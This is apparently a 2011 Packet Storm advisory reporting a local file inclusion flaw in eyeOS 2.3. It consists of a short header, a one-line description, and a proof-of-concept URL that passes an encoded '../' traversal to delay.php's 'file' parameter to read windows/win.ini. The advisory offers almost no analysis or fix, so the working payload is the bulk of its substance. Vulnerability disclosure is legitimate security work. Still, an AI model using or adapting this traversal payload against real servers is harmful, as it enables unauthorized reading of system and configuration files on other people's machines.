eyeOS 2.3 Local File Inclusion

2011-04-06T00:00:00
ID PACKETSTORM:100122
Type packetstorm
Reporter AutoSec Tools
Modified 2011-04-06T00:00:00

Description

                                        
                                            `------------------------------------------------------------------------  
Software................eyeOS 2.3  
Vulnerability...........Local File Inclusion  
Threat Level............Critical (4/5)  
Download................http://www.eyeos.org/  
Discovery Date..........4/3/2011  
Tested On...............Windows Vista + XAMPP  
------------------------------------------------------------------------  
Author..................AutoSec Tools  
Site....................http://www.autosectools.com/  
Email...................John Leitch <john@autosectools.com>  
------------------------------------------------------------------------  
  
  
--Description--  
  
A local file inclusion vulnerability in eyeOS 2.3 can be exploited to  
include arbitrary files.  
  
  
--PoC--  
  
http://localhost/eyeos/devtools/qooxdoo-sdk/framework/source/resource/qx/test/part/delay.php?sleep=0&file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini  
`